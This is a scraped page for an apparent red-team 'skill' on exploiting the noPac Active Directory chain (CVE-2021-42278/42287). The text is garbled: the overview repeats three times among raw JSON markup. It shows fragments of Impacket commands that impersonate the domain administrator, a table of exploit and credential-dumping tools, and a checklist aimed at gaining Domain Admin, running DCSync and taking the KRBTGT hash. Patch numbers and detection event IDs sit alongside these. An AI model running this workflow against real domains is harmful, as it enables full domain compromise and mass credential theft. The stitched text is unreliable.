Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

\\\n -dc-ip 10.10.10.1 domain.local/user:'Password123'","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Use S4U2self for impersonation:","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"export KRB5CCNAME=DC01.ccache\ngetST.py -self -impersonate 'administrator' -altservice 'cifs/DC01.domain.local' \\\n -k -no-pass -dc-ip 10.10.10.1 domain.local/'ATTACKPC

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…

","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Tools and Resources","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Tool","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Purpose","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Platform","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"noPac (cube0x0)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Automated scanner and exploiter","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Python","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"noPac (Ridter)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Alternative exploit implementation","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Python","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Impacket","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Kerberos ticket manipulation, DCSync","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Python","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CrackMapExec","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Vulnerability scanning module","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Python","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Rubeus","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Windows Kerberos ticket operations","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Windows (.NET)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"secretsdump.py","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Post-exploitation credential dumping","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Python","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"CVE Details","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CVE","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Description","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CVSS","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Patch","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CVE-2021-42278","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"sAMAccountName spoofing (machine accounts)","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"7.5","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"KB5008102","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"CVE-2021-42287","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"KDC PAC confusion / privilege escalation","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"7.5","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"KB5008380","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Detection Signatures","type":"text"}]},{"type":"table","attrs":{"layout":null},"content":[{"type":"tr","content":[{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Indicator","type":"text"}]}]},{"type":"th","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Detection Method","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Machine account sAMAccountName change","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Event 4742 (computer account changed) with sAMAccountName modification","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"New machine account creation","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Event 4741 (computer object created)","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"TGT request for account without trailing $","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Kerberos audit log analysis","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"S4U2self requests from non-DC machine accounts","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Event 4769 with unusual service ticket requests","type":"text"}]}]}]},{"type":"tr","content":[{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"Rapid sequence: create account, rename, request TGT","type":"text"}]}]},{"type":"td","attrs":{"colspan":1,"rowspan":1,"colwidth":null,"alignment":""},"content":[{"type":"paragraph","content":[{"text":"SIEM correlation rule for noPac attack pattern","type":"text"}]}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Validation Criteria","type":"text"}]},{"type":"checkbox_list","attrs":{"id":null},"content":[{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Domain scanned for noPac vulnerability","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"MachineAccountQuota verified (default 10)","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Exploit executed successfully (shell or DCSync)","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Domain Admin privileges obtained from standard user","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"DCSync performed to dump domain credentials","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"KRBTGT hash obtained for persistence validation","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Attack chain documented with timestamps","type":"text"}]}]},{"type":"checkbox_item","attrs":{"checked":false},"content":[{"type":"paragraph","content":[{"text":"Patch status verified (KB5008380, KB5008602)","type":"text"}]}]}]},{"type":"hr","attrs":{"markup":"---"}}]},"metadata":{"date":"2026-06-05","name":"exploiting-nopac-cve-2021-42278-42287","tags":["red-team","active-directory","nopac","cve-2021-42278","cve-2021-42287","privilege-escalation","domain-escalation"],"author":"@skillopedia","domain":"cybersecurity","source":{"stars":13207,"repo_name":"anthropic-cybersecurity-skills","origin_url":"https://github.com/mukul975/anthropic-cybersecurity-skills/blob/HEAD/skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md","repo_owner":"mukul975","body_sha256":"d2b59b776049f041f8065777419795c6fa302cc47e463942b4fb4f7b83f2c7cd","cluster_key":"b27155f04023cced3159cc0df9f4de202885820cbdb97fe0c480b84ad268cb7f","clean_bundle":{"format":"clean-skill-bundle-v1","source":"mukul975/anthropic-cybersecurity-skills/skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md","attachments":[{"id":"7c55e938-f93a-51d4-a30c-bcd5f123ff46","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/7c55e938-f93a-51d4-a30c-bcd5f123ff46/attachment.md","path":"assets/template.md","size":864,"sha256":"a27a5d1849c4e21b247a1815d6fc508895461e689ca0143110ce493e8a200653","contentType":"text/markdown; charset=utf-8"},{"id":"322b1f13-d9b0-5b61-836e-1d1cbe4ea771","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/322b1f13-d9b0-5b61-836e-1d1cbe4ea771/attachment.md","path":"references/api-reference.md","size":1983,"sha256":"14b96081e0cf7ce84d8c4f735077adba49f5690286c287632d574a85950615b7","contentType":"text/markdown; charset=utf-8"},{"id":"5b3a3454-03d3-5d22-9053-8bcd4230d48d","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/5b3a3454-03d3-5d22-9053-8bcd4230d48d/attachment.md","path":"references/standards.md","size":1075,"sha256":"7e07c4ab32afb7b4a90f8ebbba824d8f736f81becabd2708d2c95fd25cb6cb2e","contentType":"text/markdown; charset=utf-8"},{"id":"f161feb8-345d-524a-904c-cfa64ccaa837","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/f161feb8-345d-524a-904c-cfa64ccaa837/attachment.md","path":"references/workflows.md","size":615,"sha256":"9393cf8522354f3f3c15ba618b1ce1c8831d0965662c368bdeff383f8492012e","contentType":"text/markdown; charset=utf-8"},{"id":"fc6eaf13-16ea-5bde-b9c7-b8541da37fd4","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/fc6eaf13-16ea-5bde-b9c7-b8541da37fd4/attachment.py","path":"scripts/agent.py","size":4803,"sha256":"5e12e675e35963bc00633e952e36519493b9bc7f39c3297ea1b12d3de03f1fbe","contentType":"text/x-python; charset=utf-8"},{"id":"605a530d-8b42-5ff1-ad96-84c382cbdcaf","key":"uploads/10433ee7-ad12-4ae0-b34e-97553e46c6c8/605a530d-8b42-5ff1-ad96-84c382cbdcaf/attachment.py","path":"scripts/process.py","size":5056,"sha256":"e5a2f1d3b813fb38105588ea5ed675c875ae1720a1462b0fa152416746afd145","contentType":"text/x-python; charset=utf-8"}],"bundle_sha256":"d96d827629738ae5d421bcbab6e7d0dc68f4b322545c8156c03165cfb4a18e65","attachment_count":6,"text_attachments":6,"attachment_storage":"skillopedia-attachments-v1","binary_attachments":0,"excluded_attachments":[]},"cluster_size":1,"skill_md_path":"skills/exploiting-nopac-cve-2021-42278-42287/SKILL.md","import_metadata":{"date":"2026-06-05","author":"@skillopedia","version":"v1","category":"security","category_label":"Security"},"exact_dupes_collapsed_into_this":0},"license":"Apache-2.0","version":"v1","category":"security","nist_csf":["ID.RA-01","GV.OV-02","DE.AE-07"],"subdomain":"red-teaming","import_tag":"clean-skills-v1","description":"Exploit the noPac vulnerability chain (CVE-2021-42278 sAMAccountName spoofing and CVE-2021-42287 KDC PAC confusion) to escalate from standard domain user to Domain Admin in Active Directory environments.","d3fend_techniques":["Platform Monitoring","Process Code Segment Verification","Stack Frame Canary Validation","Segment Address Offset Randomization","Process Analysis"]}},"renderedAt":1782982093068}

Exploiting noPac (CVE-2021-42278 / CVE-2021-42287) Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws. Overview noPac is a critical exploit chain combining two Active Directory vulnerabilities: CVE-2021-42278 (sAMAccountName spoofing) and CVE-2021-42287 (KDC PAC confusion). Together, they allow any authenticated domain user to escalate to Domain Admin privileges, potentially achieving full domain compromise in under 60 second…